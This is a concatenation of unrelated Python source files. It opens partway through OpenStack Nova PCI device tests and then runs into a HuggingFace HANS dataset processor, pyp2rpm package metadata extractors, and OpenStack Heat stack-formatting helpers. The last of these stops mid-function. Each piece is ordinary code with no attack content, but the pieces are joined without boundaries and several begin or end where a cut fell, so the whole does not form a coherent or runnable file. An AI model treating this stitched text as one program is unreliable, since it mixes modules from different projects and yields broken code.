self.pci_stats.add_device(pci_dev_obj)
# There should be no change
self.assertIsNone(
self.pci_stats._create_pool_keys_from_dev(pci_dev_obj))
self._assertPools()
def test_remove_device_no_devspec(self, mock_get_dev_filter):
mock_get_dev_filter.return_value = self.pci_wlist
self._create_pci_devices()
pci_dev = {'compute_node_id': 1,
'address': '0000:0c:00.1',
'vendor_id': '2345',
'product_id': '0172',
'status': 'available',
'request_id': None}
pci_dev_obj = objects.PciDevice.create(pci_dev)
self.pci_stats.remove_device(pci_dev_obj)
# There should be no change
self.assertIsNone(
self.pci_stats._create_pool_keys_from_dev(pci_dev_obj))
self._assertPools()
def test_remove_device(self, mock_get_dev_filter):
mock_get_dev_filter.return_value = self.pci_wlist
self._create_pci_devices()
dev1 = self.pci_untagged_devices.pop()
self.pci_stats.remove_device(dev1)
dev2 = self.pci_tagged_devices.pop()
self.pci_stats.remove_device(dev2)
self._assertPools()
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from dataclasses import dataclass
from typing import List, Optional, Union
import tqdm
from filelock import FileLock
from transformers import (
BartTokenizer,
BartTokenizerFast,
DataProcessor,
PreTrainedTokenizer,
RobertaTokenizer,
RobertaTokenizerFast,
XLMRobertaTokenizer,
is_tf_available,
is_torch_available,
)
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class InputExample:
"""
A single training/test example for simple sequence classification.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
            Must only be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
pairID: (Optional) string. Unique identifier for the pair of sentences.
"""
guid: str
text_a: str
text_b: Optional[str] = None
label: Optional[str] = None
pairID: Optional[str] = None
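# Example construction (the field values below are invented, not taken from
# the HANS data):
#
#     example = InputExample(
#         guid="dev-1",
#         text_a="The doctor saw the lawyer.",
#         text_b="The lawyer saw the doctor.",
#         label="entailment",
#         pairID="1",
#     )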
@dataclass(frozen=True)
class InputFeatures:
"""
A single set of features of data.
Property names are the same names as the corresponding inputs to a model.
Args:
input_ids: Indices of input sequence tokens in the vocabulary.
attention_mask: Mask to avoid performing attention on padding token indices.
Mask values selected in ``[0, 1]``:
Usually ``1`` for tokens that are NOT MASKED, ``0`` for MASKED (padded) tokens.
token_type_ids: (Optional) Segment token indices to indicate first and second
portions of the inputs. Only some models use them.
label: (Optional) Label corresponding to the input. Int for classification problems,
float for regression problems.
pairID: (Optional) Unique identifier for the pair of sentences.
"""
input_ids: List[int]
attention_mask: Optional[List[int]] = None
token_type_ids: Optional[List[int]] = None
label: Optional[Union[int, float]] = None
pairID: Optional[int] = None
if is_torch_available():
import torch
from torch.utils.data.dataset import Dataset
class HansDataset(Dataset):
"""
This will be superseded by a framework-agnostic approach
soon.
"""
features: List[InputFeatures]
def __init__(
self,
data_dir: str,
tokenizer: PreTrainedTokenizer,
task: str,
max_seq_length: Optional[int] = None,
overwrite_cache=False,
evaluate: bool = False,
):
processor = hans_processors[task]()
cached_features_file = os.path.join(
data_dir,
"cached_{}_{}_{}_{}".format(
"dev" if evaluate else "train",
tokenizer.__class__.__name__,
str(max_seq_length),
task,
),
)
label_list = processor.get_labels()
if tokenizer.__class__ in (
RobertaTokenizer,
RobertaTokenizerFast,
XLMRobertaTokenizer,
BartTokenizer,
BartTokenizerFast,
):
# HACK(label indices are swapped in RoBERTa pretrained model)
label_list[1], label_list[2] = label_list[2], label_list[1]
self.label_list = label_list
# Make sure only the first process in distributed training processes the dataset,
# and the others will use the cache.
lock_path = cached_features_file + ".lock"
with FileLock(lock_path):
if os.path.exists(cached_features_file) and not overwrite_cache:
logger.info(f"Loading features from cached file {cached_features_file}")
self.features = torch.load(cached_features_file)
else:
logger.info(f"Creating features from dataset file at {data_dir}")
examples = (
processor.get_dev_examples(data_dir) if evaluate else processor.get_train_examples(data_dir)
)
logger.info("Training examples: %s", len(examples))
self.features = hans_convert_examples_to_features(examples, label_list, max_seq_length, tokenizer)
logger.info("Saving features into cached file %s", cached_features_file)
torch.save(self.features, cached_features_file)
def __len__(self):
return len(self.features)
def __getitem__(self, i) -> InputFeatures:
return self.features[i]
def get_labels(self):
return self.label_list
if is_tf_available():
import tensorflow as tf
class TFHansDataset:
"""
This will be superseded by a framework-agnostic approach
soon.
"""
features: List[InputFeatures]
def __init__(
self,
data_dir: str,
tokenizer: PreTrainedTokenizer,
task: str,
max_seq_length: Optional[int] = 128,
overwrite_cache=False,
evaluate: bool = False,
):
processor = hans_processors[task]()
label_list = processor.get_labels()
if tokenizer.__class__ in (
RobertaTokenizer,
RobertaTokenizerFast,
XLMRobertaTokenizer,
BartTokenizer,
BartTokenizerFast,
):
# HACK(label indices are swapped in RoBERTa pretrained model)
label_list[1], label_list[2] = label_list[2], label_list[1]
self.label_list = label_list
examples = processor.get_dev_examples(data_dir) if evaluate else processor.get_train_examples(data_dir)
self.features = hans_convert_examples_to_features(examples, label_list, max_seq_length, tokenizer)
def gen():
for (ex_index, ex) in tqdm.tqdm(enumerate(self.features), desc="convert examples to features"):
if ex_index % 10000 == 0:
logger.info("Writing example %d of %d" % (ex_index, len(examples)))
yield (
{
"example_id": 0,
"input_ids": ex.input_ids,
"attention_mask": ex.attention_mask,
"token_type_ids": ex.token_type_ids,
},
ex.label,
)
self.dataset = tf.data.Dataset.from_generator(
gen,
(
{
"example_id": tf.int32,
"input_ids": tf.int32,
"attention_mask": tf.int32,
"token_type_ids": tf.int32,
},
tf.int64,
),
(
{
"example_id": tf.TensorShape([]),
"input_ids": tf.TensorShape([None, None]),
"attention_mask": tf.TensorShape([None, None]),
"token_type_ids": tf.TensorShape([None, None]),
},
tf.TensorShape([]),
),
)
def get_dataset(self):
return self.dataset
def __len__(self):
return len(self.features)
def __getitem__(self, i) -> InputFeatures:
return self.features[i]
def get_labels(self):
return self.label_list
class HansProcessor(DataProcessor):
"""Processor for the HANS data set."""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "heuristics_train_set.txt")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "heuristics_evaluation_set.txt")), "dev")
def get_labels(self):
"""See base class.
Note that we follow the standard three labels for MNLI
(see :class:`~transformers.data.processors.utils.MnliProcessor`)
but the HANS evaluation groups `contradiction` and `neutral` into `non-entailment` (label 0) while
`entailment` is label 1."""
return ["contradiction", "entailment", "neutral"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = "%s-%s" % (set_type, line[0])
text_a = line[5]
text_b = line[6]
pairID = line[7][2:] if line[7].startswith("ex") else line[7]
label = line[0]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, pairID=pairID))
return examples
def hans_convert_examples_to_features(
examples: List[InputExample],
label_list: List[str],
max_length: int,
tokenizer: PreTrainedTokenizer,
):
"""
Loads a data file into a list of ``InputFeatures``
Args:
examples: List of ``InputExamples`` containing the examples.
label_list: List of labels. Can be obtained from the processor using the ``processor.get_labels()`` method.
max_length: Maximum example length.
tokenizer: Instance of a tokenizer that will tokenize the examples.
Returns:
A list of task-specific ``InputFeatures`` which can be fed to the model.
"""
label_map = {label: i for i, label in enumerate(label_list)}
features = []
for (ex_index, example) in tqdm.tqdm(enumerate(examples), desc="convert examples to features"):
if ex_index % 10000 == 0:
logger.info("Writing example %d" % (ex_index))
inputs = tokenizer(
example.text_a,
example.text_b,
add_special_tokens=True,
max_length=max_length,
padding="max_length",
truncation=True,
return_overflowing_tokens=True,
)
label = label_map[example.label] if example.label in label_map else 0
pairID = int(example.pairID)
features.append(InputFeatures(**inputs, label=label, pairID=pairID))
for i, example in enumerate(examples[:5]):
logger.info("*** Example ***")
logger.info(f"guid: {example}")
logger.info(f"features: {features[i]}")
return features
hans_tasks_num_labels = {
"hans": 3,
}
hans_processors = {
"hans": HansProcessor,
}
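# A minimal usage sketch (assumptions: a local HANS checkout containing the
# heuristics_*.txt files, and any compatible tokenizer; neither the path nor
# the model name below comes from this module):
#
#     from transformers import AutoTokenizer
#
#     tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased")
#     processor = HansProcessor()
#     examples = processor.get_dev_examples("/path/to/hans")
#     features = hans_convert_examples_to_features(
#         examples, processor.get_labels(), max_length=128, tokenizer=tokenizer
#     )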
import logging
import os
import sys
import json
import re
import tempfile
import shutil
import glob
import textwrap
from abc import ABCMeta
try:
JSONDecodeError = json.decoder.JSONDecodeError
except AttributeError:
JSONDecodeError = ValueError
import pyp2rpm.exceptions as exc
import pyp2rpm.logger
from pyp2rpm import archive
from pyp2rpm.dependency_parser import (deps_from_pyp_format,
deps_from_pydit_json)
from pyp2rpm.package_data import PackageData
from pyp2rpm.package_getters import get_url
from pyp2rpm.module_runners import SubprocessModuleRunner
from pyp2rpm import settings
try:
from pyp2rpm import virtualenv
except ImportError:
virtualenv = None
logger = logging.getLogger(__name__)
def cut_to_length(text, length, delim):
"""Shorten given text on first delimiter after given number
of characters.
"""
cut = text.find(delim, length)
if cut > -1:
return text[:cut]
else:
return text
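# Example (illustrative): cut at the first newline found at or after
# character 5, keeping the delimiter out of the result.
#
#     cut_to_length('first line\nsecond line', 5, '\n')   # -> 'first line'
#     cut_to_length('short', 5, '\n')                     # -> 'short'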
def get_interpreter_path(version=None):
"""Return the executable of a specified or current version."""
if version and version != str(sys.version_info[0]):
return settings.PYTHON_INTERPRETER + version
else:
return sys.executable
def license_from_trove(trove):
"""Finds out license from list of trove classifiers.
Args:
trove: list of trove classifiers
Returns:
Fedora name of the package license or empty string, if no licensing
information is found in trove classifiers.
"""
license = []
for classifier in trove:
if 'License' in classifier:
stripped = classifier.strip()
# if taken from EGG-INFO, begins with Classifier:
stripped = stripped[stripped.find('License'):]
if stripped in settings.TROVE_LICENSES:
license.append(settings.TROVE_LICENSES[stripped])
return ' and '.join(license)
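# Example (the exact Fedora license name depends on settings.TROVE_LICENSES,
# so the output shown here is an assumption):
#
#     license_from_trove(['License :: OSI Approved :: MIT License'])
#     # -> 'MIT' under the usual Fedora mapping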
def versions_from_trove(trove):
"""Finds out python version from list of trove classifiers.
Args:
trove: list of trove classifiers
Returns:
python version string
"""
versions = set()
for classifier in trove:
if 'Programming Language :: Python ::' in classifier:
ver = classifier.split('::')[-1]
major = ver.split('.')[0].strip()
if major:
versions.add(major)
return sorted(
set([v for v in versions if v.replace('.', '', 1).isdigit()]))
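# Example (illustrative):
#
#     versions_from_trove([
#         'Programming Language :: Python :: 2.7',
#         'Programming Language :: Python :: 3.6',
#     ])
#     # -> ['2', '3']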
def pypi_metadata_extension(extraction_fce):
"""Extracts data from PyPI and merges them with data from extraction
method.
"""
def inner(self, client=None):
data = extraction_fce(self)
if client is None:
logger.warning("Client is None, it was probably disabled")
data.update_attr('source0', self.archive.name)
return data
try:
release_data = client.release_data(self.name, self.version)
except BaseException:
logger.warning("Some kind of error while communicating with "
"client: {0}.".format(client), exc_info=True)
return data
try:
url, md5_digest = get_url(client, self.name, self.version)
except exc.MissingUrlException:
url, md5_digest = ('FAILED TO EXTRACT FROM PYPI',
'FAILED TO EXTRACT FROM PYPI')
data_dict = {'source0': url, 'md5': md5_digest}
for data_field in settings.PYPI_USABLE_DATA:
data_dict[data_field] = release_data.get(data_field, '')
# we usually get better license representation from trove classifiers
data_dict["license"] = license_from_trove(release_data.get(
'classifiers', ''))
data.set_from(data_dict, update=True)
return data
return inner
def venv_metadata_extension(extraction_fce):
"""Extracts specific metadata from virtualenv object, merges them with data
from given extraction method.
"""
def inner(self):
data = extraction_fce(self)
if virtualenv is None or not self.venv:
logger.debug("Skipping virtualenv metadata extraction.")
return data
temp_dir = tempfile.mkdtemp()
try:
extractor = virtualenv.VirtualEnv(self.local_file,
temp_dir,
self.name_convertor,
self.base_python_version)
data.set_from(extractor.get_venv_data, update=True)
except exc.VirtualenvFailException as e:
logger.error("{}, skipping virtualenv metadata extraction.".format(
e))
finally:
shutil.rmtree(temp_dir)
return data
return inner
def process_description(description_fce):
"""Removes special character delimiters, titles
and wraps paragraphs.
"""
def inner(description):
clear_description = \
re.sub(r'\s+', ' ', # multiple whitespaces
# general URLs
re.sub(r'\w+:\/{2}[\d\w-]+(\.[\d\w-]+)*(?:(?:\/[^\s/]*))*', '',
# delimiters
re.sub('(#|=|---|~|`)*', '',
# very short lines, typically titles
re.sub('((\r?\n)|^).{0,8}((\r?\n)|$)', '',
# PyPI's version and downloads tags
re.sub(
'((\r*.. image::|:target:) https?|(:align:|:alt:))[^\n]*\n', '',
description_fce(description))))))
return ' '.join(textwrap.wrap(clear_description, 80))
return inner
class LocalMetadataExtractor(object):
"""Abstract base class for metadata extractors, does not provide
implementation of main method to extract data.
"""
__metaclass__ = ABCMeta
def __init__(self, local_file, name, name_convertor, version,
rpm_name=None, venv=True, distro=None,
base_python_version=None,
metadata_extension=False):
self.local_file = local_file
self.archive = archive.Archive(local_file)
self.name = name
self.name_convertor = name_convertor
self.version = version
self.rpm_name = rpm_name
self.venv = venv
self.distro = distro
self.base_python_version = base_python_version
self.metadata_extension = metadata_extension
self.unsupported_version = None
def name_convert_deps_list(self, deps_list):
for dep in deps_list:
dep[1] = self.name_convertor.rpm_name(
dep[1], self.base_python_version)
return deps_list
@property
def venv_extraction_disabled(self):
return virtualenv is None or not self.venv
@property
def versions_from_archive(self):
"""Return Python versions extracted from trove classifiers. """
py_vers = versions_from_trove(self.classifiers)
return [ver for ver in py_vers if ver != self.unsupported_version]
@property
def has_pth(self):
"""Figure out if package has pth file """
if self.venv_extraction_disabled:
return "." in self.name
else:
return None
@property
def has_extension(self):
"""Finds out whether the packages has binary extension.
Returns:
True if the package has a binary extension, False otherwise
"""
return self.archive.has_file_with_suffix(settings.EXTENSION_SUFFIXES)
@property
def has_test_files(self):
"""Check if the archive contains files, which can be collected
by pytest.
"""
return (self.archive.get_files_re('test_.*.py') +
self.archive.get_files_re('.*_test.py')) != []
@property
def srcname(self):
"""Return srcname for the macro if the pypi name should be changed.
Those cases are:
- name was provided with -r option
- pypi name is like python-<name>
"""
if self.rpm_name or self.name.startswith(('python-', 'Python-')):
return self.name_convertor.base_name(self.rpm_name or self.name)
@pypi_metadata_extension
@venv_metadata_extension
def extract_data(self):
"""Extracts data from archive.
Returns:
PackageData object containing the extracted data.
"""
data = PackageData(
local_file=self.local_file,
name=self.name,
pkg_name=self.rpm_name or self.name_convertor.rpm_name(
self.name, pkg_name=True),
version=self.version,
srcname=self.srcname)
with self.archive:
data.set_from(self.data_from_archive)
        # For example, nose has a `packages` attribute, but instead of
        # listing the package names it uses a function to find them; that
        # makes data.packages an empty list if virtualenv is disabled.
if self.venv_extraction_disabled and getattr(data, "packages") == []:
data.packages = [data.name]
return data
@staticmethod
def separate_license_files(doc_files):
other = [doc for doc in doc_files if all(s not in doc.lower() for s in
settings.LICENSE_FILES)]
licenses = [doc for doc in doc_files if any(s in doc.lower() for s in
settings.LICENSE_FILES)]
return other, licenses
@property
def data_from_archive(self):
"""Returns all metadata extractable from the archive.
Returns:
dictionary containing metadata extracted from the archive
"""
archive_data = {}
archive_data['runtime_deps'] = self.runtime_deps
archive_data['build_deps'] = [
['BuildRequires', 'python2-devel', '{name}']] + self.build_deps
archive_data['py_modules'] = self.py_modules
archive_data['scripts'] = self.scripts
archive_data['home_page'] = self.home_page
archive_data['description'] = self.description
archive_data['summary'] = self.summary
archive_data['license'] = self.license
archive_data['has_pth'] = self.has_pth
archive_data['has_extension'] = self.has_extension
archive_data['has_test_suite'] = self.has_test_suite
archive_data['python_versions'] = self.versions_from_archive
(archive_data['doc_files'],
archive_data['doc_license']) = self.separate_license_files(
self.doc_files)
archive_data['dirname'] = self.archive.top_directory
return archive_data
class SetupPyMetadataExtractor(LocalMetadataExtractor):
"""Class to extract metadata from setup.py using custom extract_dist
command.
"""
def __init__(self, *args, **kwargs):
super(SetupPyMetadataExtractor, self).__init__(*args, **kwargs)
temp_dir = tempfile.mkdtemp()
try:
with self.archive as package_archive:
package_archive.extract_all(directory=temp_dir)
self.metadata = self._get_metadata(temp_dir)
finally:
shutil.rmtree(temp_dir)
def _get_metadata(self, temp_dir):
runner = SubprocessModuleRunner(
self.get_setup_py(temp_dir),
*settings.EXTRACT_DIST_COMMAND_ARGS + ['--stdout'])
current_version = self.base_python_version or str(sys.version_info[0])
# the version provided with `-b` option or default
paths_to_attempt = (get_interpreter_path(version=ver) for ver in (
current_version,
'2' if current_version == '3' else '3' # alternative Python version
))
for path in paths_to_attempt:
try:
logger.info("Running extract_dist command with: {0}".format(
path))
runner.run(path)
return runner.results
except (JSONDecodeError, exc.ExtractionError) as e:
logger.error("Could not extract metadata with: {0}".format(
path))
if all(hasattr(e, a) for a in ('msg', 'pos', 'doc')):
logger.error("Could not parse JSON: {0} at {1}".format(
e.msg, e.pos))
logger.error("The JSON was: {0}".format(e.doc))
self.unsupported_version = current_version
else:
sys.stderr.write("Failed to extract data from setup.py script.\n")
sys.stderr.write("Check the log for details: {0}\n".format(
', '.join(pyp2rpm.logger.destinations)))
raise SystemExit(3)
def get_setup_py(self, directory):
try:
return glob.glob("{0}/{1}*/setup.py".format(
directory, self.archive.top_directory or self.name))[0]
except IndexError:
sys.stderr.write(
"setup.py not found, maybe {} is not "
"proper source archive.\n".format(self.local_file))
raise SystemExit(3)
@property
def runtime_deps(self): # install_requires
"""Returns list of runtime dependencies of the package specified in
setup.py.
Dependencies are in RPM SPECFILE format - see dependency_to_rpm()
for details, but names are already transformed according to
current distro.
Returns:
list of runtime dependencies of the package
"""
use_rich_deps = self.distro not in settings.RPM_RICH_DEP_BLACKLIST
install_requires = self.metadata['install_requires']
if self.metadata[
'entry_points'] and 'setuptools' not in install_requires:
install_requires.append('setuptools') # entrypoints
return sorted(self.name_convert_deps_list(deps_from_pyp_format(
install_requires, runtime=True, use_rich_deps=use_rich_deps)))
@property
def build_deps(self): # setup_requires [tests_require, install_requires]
"""Same as runtime_deps, but build dependencies. Test and install
requires are included if package contains test suite to prevent
%check phase crashes because of missing dependencies
Returns:
list of build dependencies of the package
"""
use_rich_deps = self.distro not in settings.RPM_RICH_DEP_BLACKLIST
build_requires = self.metadata['setup_requires']
if self.has_test_suite:
            build_requires += (self.metadata['tests_require'] +
                               self.metadata['install_requires'])
if 'setuptools' not in build_requires:
build_requires.append('setuptools')
return sorted(self.name_convert_deps_list(deps_from_pyp_format(
build_requires, runtime=False, use_rich_deps=use_rich_deps)))
@property
def has_packages(self):
return self.metadata['packages'] != set()
@property
def packages(self):
if self.has_packages:
packages = [package.split('.', 1)[0]
for package in self.metadata['packages']]
return sorted(set(packages))
@property
def py_modules(self):
try:
return sorted(set(self.metadata['py_modules']))
except TypeError:
return []
@property
def scripts(self):
transformed = []
if self.metadata['entry_points']:
scripts = self.metadata['entry_points'].get('console_scripts', [])
# handle the case for 'console_scripts' = [ 'a = b' ]
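            # e.g. 'foo = package.module:main' yields the script name 'foo'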
for script in scripts:
equal_sign = script.find('=')
if equal_sign == -1:
transformed.append(script)
else:
transformed.append(script[0:equal_sign].strip())
transformed += self.metadata['scripts']
return sorted([os.path.basename(t) for t in set(transformed)])
@property
def home_page(self):
return self.metadata['url']
@property
@process_description
def description(self):
return cut_to_length(self.metadata['long_description'],
80 * 8, '\n')
@property
@process_description
def summary(self):
return cut_to_length(self.metadata['description'].split('\n')[0],
50, '.')
@property
def classifiers(self):
return self.metadata['classifiers']
@property
def license(self):
return self.metadata['license']
@property
def has_bundled_egg_info(self):
"""Finds out if there is a bundled .egg-info dir in the archive.
Returns:
True if the archive contains bundled .egg-info directory,
False otherwise
"""
return self.archive.has_file_with_suffix('.egg-info')
@property
def has_test_suite(self):
"""Finds out whether the package contains setup.py test suite.
Returns:
True if the package contains setup.py test suite, False otherwise
"""
return (self.has_test_files or self.metadata['test_suite'] or
self.metadata['tests_require'] != [])
@property
def doc_files(self):
"""Returns list of doc files that should be used for %doc in specfile.
Returns:
List of doc files from the archive - only basenames, not full
paths.
"""
doc_files = []
for doc_file_re in settings.DOC_FILES_RE:
doc_files.extend(
self.archive.get_files_re(doc_file_re, ignorecase=True))
return ['/'.join(x.split('/')[1:]) for x in doc_files]
@property
def sphinx_dir(self):
"""Returns directory with sphinx documentation, if there is such.
Returns:
Full path to sphinx documentation dir inside the archive, or None
if there is no such.
"""
# search for sphinx dir doc/ or docs/ under the first directory in
# archive (e.g. spam-1.0.0/doc)
candidate_dirs = self.archive.get_directories_re(
settings.SPHINX_DIR_RE, full_path=True)
# search for conf.py in the dirs (TODO: what if more are found?)
for directory in candidate_dirs:
contains_conf_py = self.archive.get_files_re(
r'{0}/conf.py$'.format(re.escape(directory)), full_path=True)
in_tests = 'tests' in directory.split(os.sep)
if contains_conf_py and not in_tests:
return directory
@property
def data_from_archive(self):
"""Appends setup.py specific metadata to archive_data."""
archive_data = super(SetupPyMetadataExtractor, self).data_from_archive
archive_data['has_packages'] = self.has_packages
archive_data['packages'] = self.packages
archive_data['has_bundled_egg_info'] = self.has_bundled_egg_info
sphinx_dir = self.sphinx_dir
if sphinx_dir:
archive_data['sphinx_dir'] = "/".join(sphinx_dir.split("/")[1:])
archive_data['build_deps'].append(
['BuildRequires', self.name_convertor.rpm_name(
"sphinx", self.base_python_version), '{name}'])
return archive_data
class WheelMetadataExtractor(LocalMetadataExtractor):
"""Class to extract metadata from wheel archive"""
@property
def json_metadata(self):
if not hasattr(self, '_json_metadata'):
self._json_metadata = self.archive.json_wheel_metadata
return self._json_metadata
def get_requires(self, requires_types):
"""Extracts requires of given types from metadata file, filter windows
specific requires.
"""
        if not isinstance(requires_types, list):
            # wrap a single name in a list; list() on a string would split
            # it into characters
            requires_types = [requires_types]
extracted_requires = []
for requires_name in requires_types:
for requires in self.json_metadata.get(requires_name, []):
                # 'environment' is an environment-marker string; skip
                # Windows-specific requirements
                if 'win' in requires.get('environment', ''):
                    continue
extracted_requires.extend(requires['requires'])
return extracted_requires
@property
def runtime_deps(self):
run_requires = self.get_requires(['run_requires', 'meta_requires'])
if 'setuptools' not in run_requires:
run_requires.append('setuptools')
return self.name_convert_deps_list(deps_from_pydit_json(run_requires))
@property
def build_deps(self):
build_requires = self.get_requires(['build_requires'])
if self.has_test_suite:
build_requires += self.get_requires([
'test_requires', 'run_requires'])
if 'setuptools' not in build_requires:
build_requires.append('setuptools')
return self.name_convert_deps_list(deps_from_pydit_json(
build_requires, runtime=False))
@property
def py_modules(self):
return self.archive.record.get('modules')
@property
def scripts(self):
return self.archive.record.get('scripts', [])
@property
def home_page(self):
        urls = list(self.json_metadata.get('extensions', {})
                    .get('python.details', {})
                    .get('project_urls', {}).values())
if urls:
return urls[0]
@property
@process_description
def description(self):
return self.archive.wheel_description()
@property
def summary(self):
return self.json_metadata.get('summary', None)
@property
def classifiers(self):
return self.json_metadata.get('classifiers', [])
@property
def license(self):
return self.json_metadata.get('license', None)
@property
def has_test_suite(self):
return self.has_test_files or self.json_metadata.get(
'test_requires', False) is not False
@property
def doc_files(self):
return (self.json_metadata.get('extensions', {})
.get('python.details', {})
.get('document_names', {})
.values())
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from oslo_log import log as logging
from oslo_utils import timeutils
import six
from heat.common.i18n import _
from heat.common.i18n import _LE
from heat.common import param_utils
from heat.common import template_format
from heat.engine import constraints as constr
from heat.rpc import api as rpc_api
LOG = logging.getLogger(__name__)
def extract_args(params):
"""Extract arguments passed as parameters and return them as a dictionary.
Extract any arguments passed as parameters through the API and return them
as a dictionary. This allows us to filter the passed args and do type
conversion where appropriate
"""
kwargs = {}
timeout_mins = params.get(rpc_api.PARAM_TIMEOUT)
if timeout_mins not in ('0', 0, None):
try:
timeout = int(timeout_mins)
except (ValueError, TypeError):
LOG.exception(_LE('Timeout conversion failed'))
else:
if timeout > 0:
kwargs[rpc_api.PARAM_TIMEOUT] = timeout
else:
raise ValueError(_('Invalid timeout value %s') % timeout)
name = rpc_api.PARAM_DISABLE_ROLLBACK
if name in params:
disable_rollback = param_utils.extract_bool(name, params[name])
kwargs[name] = disable_rollback
name = rpc_api.PARAM_SHOW_DELETED
if name in params:
params[name] = param_utils.extract_bool(name, params[name])
adopt_data = params.get(rpc_api.PARAM_ADOPT_STACK_DATA)
if adopt_data:
try:
adopt_data = template_format.simple_parse(adopt_data)
except ValueError as exc:
raise ValueError(_('Invalid adopt data: %s') % exc)
kwargs[rpc_api.PARAM_ADOPT_STACK_DATA] = adopt_data
tags = params.get(rpc_api.PARAM_TAGS)
if tags:
if not isinstance(tags, list):
raise ValueError(_('Invalid tags, not a list: %s') % tags)
for tag in tags:
if not isinstance(tag, six.string_types):
raise ValueError(_('Invalid tag, "%s" is not a string') % tag)
if len(tag) > 80:
raise ValueError(_('Invalid tag, "%s" is longer than 80 '
'characters') % tag)
# Comma is not allowed as per the API WG tagging guidelines
if ',' in tag:
raise ValueError(_('Invalid tag, "%s" contains a comma') % tag)
kwargs[rpc_api.PARAM_TAGS] = tags
return kwargs
def _parse_object_status(status):
"""Parse input status into action and status if possible.
This function parses a given string (or list of strings) and see if it
contains the action part. The action part is exacted if found.
:param status: A string or a list of strings where each string contains
a status to be checked.
:returns: (actions, statuses) tuple, where actions is a set of actions
extracted from the input status and statuses is a set of pure
object status.
"""
if not isinstance(status, list):
status = [status]
status_set = set()
action_set = set()
for val in status:
# Note: cannot reference Stack.STATUSES due to circular reference issue
for s in ('COMPLETE', 'FAILED', 'IN_PROGRESS'):
index = val.rfind(s)
if index != -1:
status_set.add(val[index:])
if index > 1:
action_set.add(val[:index - 1])
break
return action_set, status_set
def translate_filters(params):
"""Translate filter names to their corresponding DB field names.
:param params: A dictionary containing keys from engine.api.STACK_KEYS
and other keys previously leaked to users.
    :returns: A dict containing only valid DB field names.
"""
key_map = {
rpc_api.STACK_NAME: 'name',
rpc_api.STACK_ACTION: 'action',
rpc_api.STACK_STATUS: 'status',
rpc_api.STACK_STATUS_DATA: 'status_reason',
rpc_api.STACK_DISABLE_ROLLBACK: 'disable_rollback',
rpc_api.STACK_TIMEOUT: 'timeout',
rpc_api.STACK_OWNER: 'username',
rpc_api.STACK_PARENT: 'owner_id',
rpc_api.STACK_USER_PROJECT_ID: 'stack_user_project_id',
}
for key, field in key_map.items():
value = params.pop(key, None)
if not value:
continue
fld_value = params.get(field, None)
if fld_value:
if not isinstance(fld_value, list):
fld_value = [fld_value]
if not isinstance(value, list):
value = [value]
value.extend(fld_value)
params[field] = value
# Deal with status which might be of form <ACTION>_<STATUS>, e.g.
# "CREATE_FAILED". Note this logic is still not ideal due to the fact
# that action and status are stored separately.
if 'status' in params:
a_set, s_set = _parse_object_status(params['status'])
statuses = sorted(s_set)
params['status'] = statuses[0] if len(statuses) == 1 else statuses
if a_set:
a = params.get('action', [])
action_set = set(a) if isinstance(a, list) else set([a])
actions = sorted(action_set.union(a_set))
params['action'] = actions[0] if len(actions) == 1 else actions
return params
def format_stack_outputs(stack, outputs):
"""Return a representation of the given output template.
Return a representation of the given output template for the given stack
that matches the API output expectations.
"""
def format_stack_output(k):
output = {
rpc_api.OUTPUT_DESCRIPTION: outputs[k].get('Description',
'No description given'),
rpc_api.OUTPUT_KEY: k,
rpc_api.OUTPUT_VALUE: stack.output(k)
}
if outputs[k].get('error_msg'):
output.update({rpc_api.OUTPUT_ERROR: outputs[k].get('error_msg')})
return output
return [format_stack_output(key) for key in outputs]
def format_stack(stack, preview=False):
"""Return a representation of the given stack.
Return a representation of the given stack that matches the API output
expectations.
"""
updated_time = stack.updated_time and stack.updated_time.isoformat()
created_time = stack.created_time or timeutils.utcnow()
info = {
rpc_api.STACK_NAME: stack.name,
rpc_api.STACK_ID: dict(stack.identifier()),
rpc_api.STACK_CREATION_TIME: created_time.isoformat(),
rpc_api.STACK_UPDATED_TIME: updated_time,
rpc_api.STACK_NOTIFICATION_TOPICS: [], # TODO(?) Not implemented yet
rpc_api.STACK_PARAMETERS: stack.parameters.map(str),
rpc_api.STACK_DESCRIPTION: stack.t[stack.t.DESCRIPTION],
rpc_api.STACK_TMPL_DESCRIPTION: stack.t[stack.t.DESCRIPTION],
rpc_api.STACK_CAPABILITIES: [], # TODO(?) Not implemented yet
rpc_api.STACK_DISABLE_ROLLBACK: stack.disable_rollback,
rpc_api.STACK_TIMEOUT: stack.timeout_mins,
rpc_api.STACK_OWNER: stack.username,
rpc_api.STACK_PARENT: stack.owner_id,
rpc_api.STACK_USER_PROJECT_ID: stack.stack_user_project_id,
rpc_api.STACK_TAGS: stack.tags,
}
if not preview:
update_info = {
rpc_api.STACK_ACTION: stack.action or '',
rpc_api.STACK_STATUS: stack.status or '',
rpc_api.STACK_STATUS_DATA: stack.status_reason,
}
info.update(update_info)
# allow users to view the outputs of stacks
